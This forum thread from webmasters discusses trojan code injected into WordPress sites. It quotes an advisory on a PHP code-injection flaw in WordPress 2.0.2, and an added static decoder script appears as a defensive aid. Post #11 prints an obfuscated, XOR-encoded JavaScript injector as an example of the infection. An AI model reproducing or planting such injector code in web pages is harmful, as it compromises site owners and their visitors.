WORDPRESS - trojan-virus

  • SmokeyTheBear
    ►SouthOfHeaven
    • Jun 2004
    • 28609

    #1

    WORDPRESS - trojan-virus

    I have had a lot of people contacting me recently about trojans and viruses on their sites that show up mysteriously on all their pages.

    The common factor seems to be WordPress. I am not a WordPress user so I don't know what's up, but if you are running WordPress I suggest doing an update regardless, and if you are having problems contact your host to have your server cleaned up.

    P.S. Just because you got rid of it once doesn't mean it's gone. It's likely hiding in the shadows waiting to reinstall itself.

    P.P.S. I recently invented a very useful tool for checking sites:
    http://tools.webspacemania.com/proxy/
    What this is is a "double anonymous" browser that will surf to any domain using a random proxy that then forwards the HTML to my server through the proxy, then redisplays the results to you. (It's also useful to determine if you're having network troubles connecting to a site.)

    Keep in mind it's going through several proxies so it takes a bit of time, and sometimes the proxies are dead so it will fail. Also keep in mind the images are redisplayed inline in your browser, so while the page contents are completely anonymous, any images will be redisplayed inline through your browser, so if you want to be ULTRA anonymous, turn off images in your browser first.

    The script will disable any JavaScript on the target page so you don't have to worry about trojans and such when checking a site.

    When you test a site, the proxy port and country of the proxy will be displayed in the upper left-hand corner of any page you check.
    hatisblack at yahoo.com
  • 2HousePlague
    CURATOR
    • Jul 2004
    • 14572

    #2
    Thanks!






    2hp
    tada!


    • SmokeyTheBear
      ►SouthOfHeaven
      • Jun 2004
      • 28609

      #3
      bump 4 wordpress peeps
      hatisblack at yahoo.com


      • Scotty.T
        Confirmed User
        • Nov 2004
        • 1062

        #4
        Giving this a try but I can't read the results page properly. The proxy info box covers part of the message. I can only see the last 5 letters of a word 'ently'.


        • baddog
          So Fucking Banned
          • Apr 2001
          • 107089

          #5
          What is this trojan doing that people noticed a problem?

          What version of WP was the common denominator?


          • nancycash
            My Sig was too Big! :(
            • May 2006
            • 222

            #6
            thanks for useful link and info. esp. for link - now it's in my "favorites"
            NEW SOLO GIRL


            • Violetta
              Affiliate
              • Jul 2004
              • 28735

              #7
              I had some trojans on my servers earlier today. Perhaps they came from a wordpress... Had to upgrade. Thanks for the info!
              M&A Queen


              • Basic_man
                Programming King Pin
                • Oct 2003
                • 27360

                #8
                Thanks for the info, I'll take a closer look at this.
                UUGallery Builder - automated photo/video gallery plugin for Wordpress!
                Stop looking! Checkout Naked Hosting, online since 1999 !


                • Rebecca Love
                  Skinemax BQueen
                  • Jul 2004
                  • 2145

                  #9
                  bump again for WP crew!


                  Kisses,
                  Rebecca Love
                  "Skinemax BQueen of Late-Nite"
                  www.RebeccaLove.com


                  • ladida
                    Confirmed User
                    • Nov 2005
                    • 2179

                    #10
                    It's a vulnerability in WordPress actually that, among other things, allows people to install a trojan on your system.
                    agentGFY *at* gmail.com


                    • fetishblog
                      Confirmed User
                      • Sep 2005
                      • 5995

                      #11
                      <script language="JavaScript">
                      e = '0x00' + '22';str1 = "%99%C1%CA%D7%BD%D0%D1%DA%C9%C6%9E%83%D7%CA%D0%CA% C3%CA%C9%CA%D1%DA%9B%C5%CA%C1%C1%C6%CF%83%9F%99%CA %C7%D3%C2%CE%C6%BD%D0%D3%C0%9E%83%C5%D1%D1%CD%9B%8 C%8C%C1%CF%D7%8E%C0%CC%D6%CF%D1%C6%D3%8F%C0%CC%CE% 8C%D1%D3%C7%8C%83%BD%D4%CA%C1%D1%C5%9E%92%BD%C5%C6 %CA%C4%C5%D1%9E%92%9F%99%8C%CA%C7%D3%C2%CE%C6%9F%9 9%8C%C1%CA%D7%9F%BD%AE%AB";str=tmp='';for(i=0;i<st r1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);
                      </script>
                      This is what the malicious code usually looks like that he is talking about.

                      Fling.com doesn't steal your traffic and sales unlike some other dating companies. I promote them, and so should you!
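
An added example, not part of the original post and not code from any participant: a static decoder for the encoding visible in the snippet above (each %XX byte is XORed with the key in `e`, then reduced by 127), so the injected markup can be read without loading the page in a browser. The sample input is constructed and encodes a harmless iframe pointing at example.invalid; the function names are hypothetical, and the variable names `e` and `str1` are taken from the posted snippet, which other variants may rename.

```javascript
// Static decoder for the injector pattern shown in post #11: nothing is eval'd,
// the script text is only parsed. Function names are hypothetical.

// Constructed sample (not taken from the thread): a harmless iframe tag for
// example.invalid, with stray spaces like those forum line-wrapping inserts.
const SAMPLE =
  `<script>e = '0x00' + '22';str1 = "` +
  '%99%CA%C7%D3%C2%CE%C6%BD%D0%D3%C0%9E%83%C5%D1%D1%CD% 9B%8C%8C%C6%D5%C2%CE' +
  '%CD%C9%C6%8F%CA%CF%D7%C2%C9%CA%C1%8 C%83%9F%99%8C%CA%C7%D3%C2%CE%C6%9F' +
  `";/* decoding loop omitted */document.write(str);</script>`;

// The key is assembled from quoted fragments, e.g. e = '0x00' + '22'.
function extractKey(src) {
  const m = /\be\s*=\s*((?:'[^']*'\s*\+?\s*)+);/.exec(src);
  if (!m) return null;
  const joined = [...m[1].matchAll(/'([^']*)'/g)].map((x) => x[1]).join('');
  const key = Number(joined); // same string-to-number coercion as (code ^ e)
  return Number.isInteger(key) ? key : null;
}

// Pull out the percent-encoded blob and drop whitespace added by wrapping.
function extractBlob(src) {
  const m = /\bstr1\s*=\s*"([^"]*)"/.exec(src);
  return m ? m[1].replace(/\s+/g, '') : null;
}

// Reverse the transform: plaintext char = (byte XOR key) - 127.
function decode(blob, key) {
  const bytes = blob.match(/%[0-9A-Fa-f]{2}/g) || [];
  return bytes
    .map((b) => String.fromCharCode((parseInt(b.slice(1), 16) ^ key) - 127))
    .join('');
}

// Returns the decoded markup plus the first iframe target, or null when the
// input does not contain both the key and the blob.
function analyze(src) {
  const key = extractKey(src);
  const blob = extractBlob(src);
  if (key === null || blob === null) return null;
  const html = decode(blob, key);
  const m = /<iframe[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(html);
  return { key, html, iframeSrc: m ? m[1] : null };
}

console.log(analyze(SAMPLE));
```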


                      • OzMan
                        Confirmed User
                        • Sep 2003
                        • 9162

                        #12
                        hmm nothing on the WP site yet... any confirmation that it's actually a WP problem?


                        • OzMan
                          Confirmed User
                          • Sep 2003
                          • 9162

                          #13
                          apparently jerzeemedia is familiar with the problem and solution

                          http://www.gofuckyourself.com/showth...oto=nextnewest


                          • SmokeyTheBear
                            ►SouthOfHeaven
                            • Jun 2004
                            • 28609

                            #14
                            Originally posted by OzMan
                            hmm nothing on the WP site yet... any confirmation that it's actually a WP problem?
                            Haven't seen anything but been contacted by nearly a dozen people this week, that was the only common thing so far (there are other scripts being hit though, like trade scripts).
                            hatisblack at yahoo.com


                            • Corona
                              Confirmed User
                              • Feb 2002
                              • 2185

                              #15
                              It has to be more than just a wordpress problem.

                              I had something that looked like the example fetishblog posted and the only script used is phpadsnew.

                              Anyone know what it does?
                              I was looking for a job, and then I found a job
                              And heaven knows I'm miserable now


                              • baddog
                                So Fucking Banned
                                • Apr 2001
                                • 107089

                                #16
                                I will ask again . . . what version of Wordpress is this happening on?


                                • nico-t
                                  emperor of my world
                                  • Aug 2004
                                  • 29903

                                  #17
                                  yea we need more details


                                  • JD
                                    Too lazy to set a custom title
                                    • Sep 2003
                                    • 22651

                                    #18
                                    Originally posted by baddog
                                    I will ask again . . . what version of Wordpress is this happening on?
                                    i'm wondering the same thing.


                                    • dunefield
                                      www.barely18movies.com
                                      • Feb 2003
                                      • 10920

                                      #19
                                      bump....


                                      • SmokeyTheBear
                                        ►SouthOfHeaven
                                        • Jun 2004
                                        • 28609

                                        #20
                                        Someone mentioned it in another thread. I'm not familiar with the product because I don't use it... (I'm referring to the version number affected)
                                        hatisblack at yahoo.com


                                        • baddog
                                          So Fucking Banned
                                          • Apr 2001
                                          • 107089

                                          #21
                                          Originally posted by SmokeyTheBear
                                          Someone mentioned it in another thread. I'm not familiar with the product because I don't use it... (I'm referring to the version number affected)

                                          I would be inclined to think it was a common plugin they were using rather than WP itself.


                                          • poondaddy
                                            Confirmed User
                                            • Feb 2006
                                            • 211

                                            #22
                                            There was a security update for Wordpress released a month or so ago, 2.02


                                            • SmokeyTheBear
                                              ►SouthOfHeaven
                                              • Jun 2004
                                              • 28609

                                              #23
                                              http://www.gofuckyourself.com/showthread.php?t=613700
                                              hatisblack at yahoo.com


                                              • JD
                                                Too lazy to set a custom title
                                                • Sep 2003
                                                • 22651

                                                #24
                                                just checked all of my wp blogs and nothing found. whew


                                                • SmokeyTheBear
                                                  ►SouthOfHeaven
                                                  • Jun 2004
                                                  • 28609

                                                  #25
                                                  Advisory ID : FrSIRT/ADV-2006-1992
                                                  CVE ID : GENERIC-MAP-NOMATCH
                                                  Rated as : High Risk
                                                  Remotely Exploitable : Yes
                                                  Locally Exploitable : Yes
                                                  Release Date : 2006-05-26

                                                  Technical Description

                                                  A vulnerability has been identified in WordPress, which may be exploited by attackers to compromise a vulnerable web server. This flaw is due to input validation errors in the "wp-admin/profile.php" script that does not validate certain parameters before being written to PHP scripts in the "wp-content/cache/userlogins/" and "wp-content/cache/users/" directories, which could be exploited by malicious users to inject and execute arbitrary PHP code with the privileges of the web server.

                                                  Note : An input validation error in the "vars.php" script when handling the "PC_REMOTE_ADDR" HTTP header could be exploited by attackers to spoof their IP addresses.

                                                  Affected Products

                                                  WordPress version 2.0.2 and prior

                                                  Solution

                                                  The FrSIRT is not aware of any official supplied patch for this issue.
                                                  hatisblack at yahoo.com


                                                  • baddog
                                                    So Fucking Banned
                                                    • Apr 2001
                                                    • 107089

                                                    #26
                                                    okay, thanks


                                                    • AlienQ - BANNED FOR LIFE
                                                      best designer on GFY
                                                      • Mar 2003
                                                      • 30307

                                                      #27
                                                      I was a victim of this piece of shit.
